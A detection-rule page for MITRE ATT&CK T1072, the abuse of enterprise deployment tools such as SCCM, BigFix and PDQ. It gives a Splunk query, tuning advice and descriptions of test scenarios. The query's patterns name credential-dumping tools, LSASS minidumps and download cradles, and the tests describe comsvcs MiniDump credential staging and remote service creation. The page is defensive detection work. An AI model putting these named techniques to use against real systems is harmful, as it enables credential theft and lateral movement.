T1072 Splunk · SPL

Detect Software Deployment Tools in Splunk

Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications — including Microsoft SCCM/ConfigMgr, HCL BigFix, PDQ Deploy, Symantec Altiris, Microsoft Intune, Azure Arc, AWS Systems Manager (SSM), and RAdmin — are widely deployed for enterprise endpoint management. Adversaries who compromise or abuse these platforms gain the ability to execute arbitrary commands across all enrolled systems simultaneously, often running as SYSTEM or with elevated privileges. Real-world abuse includes APT32 compromising McAfee ePO for malware distribution, Sandworm Team using RemoteExec for agentless lateral movement, Medusa Group deploying ransomware payloads via BigFix and PDQ Deploy, and Threat Group-1314 abusing Altiris for network-wide propagation.

MITRE ATT&CK

Tactic
Execution Lateral Movement
Technique
T1072 Software Deployment Tools
Canonical reference
https://attack.mitre.org/techniques/T1072/

SPL Detection Query

Splunk (SPL)
spl 
index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
    (ParentImage="*\\ccmexec.exe" OR ParentImage="*\\ccmsetup.exe"
     OR ParentImage="*\\besclient.exe" OR ParentImage="*\\besservice.exe"
     OR ParentImage="*\\PDQDeployRunner.exe" OR ParentImage="*\\PDQDeploy.exe"
     OR ParentImage="*\\AeXNSAgent.exe" OR ParentImage="*\\AeXSWDSvc.exe"
     OR ParentImage="*\\IntuneManagementExtension.exe"
     OR ParentImage="*\\amazon-ssm-agent.exe"
     OR ParentImage="*\\RemoteExec.exe"
     OR ParentImage="*\\radmin.exe" OR ParentImage="*\\r_server.exe")
    (Image="*\\cmd.exe" OR Image="*\\powershell.exe" OR Image="*\\pwsh.exe"
     OR Image="*\\wscript.exe" OR Image="*\\cscript.exe" OR Image="*\\mshta.exe"
     OR Image="*\\certutil.exe" OR Image="*\\bitsadmin.exe" OR Image="*\\rundll32.exe"
     OR Image="*\\regsvr32.exe" OR Image="*\\wmic.exe" OR Image="*\\net.exe"
     OR Image="*\\net1.exe" OR Image="*\\whoami.exe" OR Image="*\\nltest.exe"
     OR Image="*\\schtasks.exe" OR Image="*\\sc.exe" OR Image="*\\reg.exe")
| eval cmd=lower(CommandLine)
| eval CredentialAccess=if(match(cmd, "(lsass|procdump|mimikatz|sekurlsa|comsvcs|ntds\.dit|minidump)"), 1, 0)
| eval LateralMovement=if(match(cmd, "(psexec|wmic\s+/node|net\s+use|xcopy|robocopy|enter-pssession)"), 1, 0)
| eval PersistenceAttempt=if(match(cmd, "(schtasks\s+/create|sc\s+create|reg\s+add.*(run|startup)|localgroup.*administrator)"), 1, 0)
| eval DownloadAttempt=if(match(cmd, "(downloadstring|downloadfile|invoke-webrequest|iwr\s|certutil.*urlcache|bitsadmin.*transfer|net\.webclient|start-bitstransfer)"), 1, 0)
| eval EncodedCmd=if(match(cmd, "(-encodedcommand|-enc\s|-e\s|-ec\s)"), 1, 0)
| eval ReconActivity=if(match(cmd, "(whoami|net\s+user|net\s+group|nltest|ipconfig|systeminfo|netstat|tasklist|net\s+localgroup)"), 1, 0)
| eval HiddenExec=if(match(cmd, "(-windowstyle\s+hidden|-w\s+hidden|-nop\s|-noni\s)"), 1, 0)
| eval RiskScore=CredentialAccess*5 + LateralMovement*4 + PersistenceAttempt*4 + DownloadAttempt*3 + EncodedCmd*2 + (ReconActivity * HiddenExec)*3 + ReconActivity*1
| where RiskScore > 0
| table _time, host, User, Image, CommandLine, ParentImage, ParentCommandLine, CredentialAccess, LateralMovement, PersistenceAttempt, DownloadAttempt, EncodedCmd, ReconActivity, HiddenExec, RiskScore
| sort - RiskScore, - _time
high severity medium confidence

Detects suspicious commands executed by software deployment tool agent processes using Sysmon Event ID 1 (Process Creation). Identifies known deployment agents as parent processes spawning living-off-the-land binaries with malicious command patterns. Assigns weighted risk scores per attack category: credential access (5), lateral movement (4), persistence attempts (4), download cradles (3), encoded commands (2), stealthy reconnaissance (3), and general recon (1). Alerts with RiskScore >= 4 warrant immediate investigation; high-confidence detections typically score 5+.

Data Sources

Process: Process CreationCommand: Command ExecutionSysmon Event ID 1

Required Sourcetypes

XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

False Positives & Tuning

  • SCCM deployment scripts legitimately spawn PowerShell and cmd.exe — tune by allowlisting known-good ParentCommandLine patterns associated with authorized package GUIDs
  • BigFix and PDQ Deploy administrative tasks frequently trigger this detection during patch cycles; suppress during scheduled maintenance windows using a lookup table of authorized job IDs
  • Intune PowerShell scripts deployed by administrators appear as IntuneManagementExtension.exe spawning PowerShell with -ExecutionPolicy Bypass, which is a built-in Intune behavior
  • AWS SSM Run Command on Windows EC2 instances appears as amazon-ssm-agent.exe spawning cmd.exe or PowerShell for authorized runbook execution
  • Automated patch management tools use certutil and bitsadmin for update package verification, triggering DownloadAttempt flags on patch Tuesdays
  • Inventory scans using net.exe commands trigger ReconActivity — correlate against scheduled maintenance windows and approved scan job timers
Download portable Sigma rule (.yml)

Other platforms for T1072

Microsoft Sentinel (KQL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Simulate Malicious Reconnaissance via Deployment Tool Child Process

    Expected signal: Sysmon Event ID 1: cmd.exe with CommandLine containing 'whoami /all', 'net user /domain', 'nltest /domain_trusts', and 'net localgroup administrators'. Security Event ID 4688 (with command line auditing enabled) showing the full command chain. Each net.exe/nltest.exe subprocess also generates its own Event ID 1.

  2. Test 2Simulate Hidden PowerShell Execution with Download Cradle via Deployment Context

    Expected signal: Sysmon Event ID 1: powershell.exe with CommandLine containing '-ExecutionPolicy Bypass', '-WindowStyle Hidden', '-NoProfile', '-NonInteractive', 'Net.WebClient', and 'DownloadString'. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:9999 (connection refused). PowerShell ScriptBlock Log Event ID 4104 with full script content.

  3. Test 3Simulate Credential Staging via Deployment Tool (comsvcs MiniDump)

    Expected signal: Sysmon Event ID 1: powershell.exe with CommandLine referencing 'comsvcs.dll' and 'MiniDump'. Sysmon Event ID 1 child: rundll32.exe with CommandLine 'comsvcs.dll, MiniDump <PID>'. Sysmon Event ID 10: Process Access event targeting lsass.exe with GrantedAccess 0x1FFFFF. Security Event ID 4656: Handle request to lsass.exe. EDR should generate a LSASS credential access alert independently.

  4. Test 4Simulate AWS SSM Run Command Abuse

    Expected signal: AWS CloudTrail: EventName=SendCommand, EventSource=ssm.amazonaws.com, with userIdentity.arn of the calling principal, sourceIPAddress of the attacker host, and requestParameters.documentName=AWS-RunShellScript. SSM agent log on target instance: /var/log/amazon/ssm/amazon-ssm-agent.log shows command receipt. CloudWatch Logs (if configured): command output stored at the configured S3 output bucket.

  5. Test 5Simulate Lateral Movement via Deployment Tool (Remote Service Installation)

    Expected signal: Sysmon Event ID 1: cmd.exe with CommandLine containing 'sc \\127.0.0.1 create' and service binary path. Security Event ID 7045 (System log): New service 'df00tech_test_svc' installed on the system. Security Event ID 4697: A service was installed in the system (if service installation auditing is enabled). Security Event ID 4624: Logon event for the remote connection authentication.

Last updated: 2026-04-13 Research depth: deep
References (10)

Unlock Pro Content

Get the full detection package for T1072 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Related Techniques

T1651Cloud Administration CommandT1021Remote ServicesT1059.001PowerShellT1059.003Windows Command ShellT1053.005Scheduled TaskT1543.003Windows ServiceT1047Windows Management InstrumentationT1485Data DestructionT1486Data Encrypted for Impact

Same Tactic: Execution

Popular Detections